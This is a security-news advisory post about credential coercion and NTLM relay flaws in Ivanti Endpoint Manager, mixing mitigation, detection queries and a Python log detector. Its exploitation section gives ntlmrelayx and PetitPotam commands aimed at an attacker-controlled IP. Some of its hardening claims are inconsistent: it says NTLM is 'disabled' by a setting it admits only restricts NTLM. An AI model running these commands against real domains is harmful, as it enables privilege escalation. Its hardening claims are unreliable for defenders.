Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities (CVE–)

Proof of concept exploits for Ivanti EPM CVE-2024-13159 and other vulnerabilities have been disclosed, allowing unauthenticated coercion of the Ivanti EPM machine credential for use in relay attacks.

POC: https://lnkd.in/diHhiVjK

You Should Know:

1. Understanding Credential Coercion & Relay Attacks

Credential coercion forces a system to authenticate to a server the attacker controls; a relay attack then forwards that authentication, as it happens, to another service, so the attacker acts with the coerced account's privileges.

2. Vulnerable Ivanti EPM Components

  • EPM Cloud Services Appliance (CSA)
  • EPM Core Server
  • EPM Agent

3. Proof-of-Concept Exploitation Steps

```bash
# Use Impacket's ntlmrelayx for coercion attack
ntlmrelayx.py -t ldap://<target_DC_IP> --escalate-user <compromised_machine$>

# Force authentication via PetitPotam (Python alternative)
python3 petitpotam.py -d <domain> -u <user> -p <password> <attacker_IP> <target_IP>
```

4. Mitigation & Detection

  • Disable NTLM: Enforce Kerberos-only authentication.

```powershell
# Group Policy "LAN Manager authentication level" (Windows), set here through its registry value
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5
```

    Level 5 refuses LM and NTLMv1 but still accepts NTLMv2, so on its own it hardens NTLM rather than disables it.

  • Network Segmentation: Restrict EPM server communication.
  • Patch Management: Apply Ivanti's latest security updates.

5. Post-Exploitation Command Checks

```bash
# Inspect the host keytab (Linux); klist -k lists the keytab's entries, not issued service tickets
sudo klist -ket /etc/krb5.keytab
```

```powershell
# Look for NTLM logons in the Security log: 4624 carries "Authentication Package: NTLM" and
# 4776 is the DC's NTLM credential validation (4768/4769 are Kerberos TGT/TGS events and never match "NTLM")
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4776} | Where-Object {$_.Message -match "NTLM"}
```
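Event-log queries like the one above return every NTLM logon; the relay pattern this post describes is narrower: the EPM machine account (a name ending in `$`) authenticating over NTLM from an address that is not its own host. The following is an added example, not code from the post or from Ivanti, that applies that rule to constructed 4624-style records; the host names, domain, addresses and the `KNOWN_HOSTS` inventory are hypothetical.

```python
import re

def _evt(account, pkg, src, logon_type="3"):
    """Build a constructed 4624-style Message block (as Get-WinEvent shows it)."""
    return {"EventID": 4624, "Message": (
        "An account was successfully logged on.\n"
        f"Account Name:\t\t{account}\nAccount Domain:\t\tCORP\n"
        f"Logon Type:\t\t{logon_type}\nAuthentication Package:\t{pkg}\n"
        f"Source Network Address:\t{src}\n")}

# Constructed sample records; RFC 5737 addresses, hypothetical host names.
SAMPLE_EVENTS = [
    _evt("EPM-CORE$", "NTLM", "192.0.2.10"),      # core server's own address: expected
    _evt("EPM-CORE$", "NTLM", "198.51.100.77"),   # machine credential arriving from elsewhere
    _evt("EPM-CORE$", "Kerberos", "192.0.2.10"),  # Kerberos, not NTLM
    _evt("jdoe", "NTLM", "198.51.100.77"),        # user account: outside this rule
]

# Hypothetical inventory: the address(es) each machine account normally logs on from.
KNOWN_HOSTS = {"EPM-CORE$": {"192.0.2.10"}, "EPM-CSA$": {"192.0.2.11"}}

FIELD_RE = re.compile(r"^(Account Name|Logon Type|Authentication Package|"
                      r"Source Network Address):\s*(.+?)\s*$", re.M)

def parse_event(event):
    """Extract the fields the rule needs. dict() keeps the last occurrence of a
    repeated field, which in a real 4624 is the 'New Logon' section, not 'Subject'."""
    return dict(FIELD_RE.findall(event["Message"]))

def is_suspicious(fields, known_hosts):
    """NTLM network logon by a machine account from an address not tied to that account."""
    account = fields.get("Account Name", "")
    if not account.endswith("$") or fields.get("Logon Type") != "3":
        return False
    if fields.get("Authentication Package") != "NTLM":
        return False
    return fields.get("Source Network Address") not in known_hosts.get(account, set())

def find_relayed_machine_logons(events, known_hosts=KNOWN_HOSTS):
    """Return (account, source address) pairs that warrant investigation."""
    hits = []
    for event in events:
        if event.get("EventID") != 4624:
            continue
        fields = parse_event(event)
        if is_suspicious(fields, known_hosts):
            hits.append((fields["Account Name"], fields["Source Network Address"]))
    return hits

if __name__ == "__main__":
    for account, src in find_relayed_machine_logons(SAMPLE_EVENTS):
        print(f"NTLM logon by {account} from unexpected address {src}")
```

A real deployment would feed this from exported Security-log events rather than the constructed list, and would treat the inventory as the list of addresses each EPM component is actually installed on.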

### **What Undercode Say**

The Ivanti EPM vulnerabilities highlight critical risks in credential handling, emphasizing the need for robust identity management. Organizations must:

  • Enforce SMB Signing to prevent relay attacks:

```powershell
Set-SmbServerConfiguration -RequireSecuritySignature $true
```

  • Monitor LDAP/SMB Logs for anomalous authentication attempts.
  • Use Linux-based detection tools like `tshark` for NTLM traffic:

```bash
sudo tshark -Y "ntlmssp" -i eth0 -V
```

  • Deploy AD anomaly detection with tools like BloodHound.

**Expected Output:**

A hardened Ivanti EPM environment with disabled NTLM, enforced Kerberos, and continuous monitoring for coercion attempts.

Note: Always test patches and mitigations in a non-production environment first.

References:

Reported By: Alvinbijo Ivanti – Hackers Feeds
Extra Hub: Undercode MoN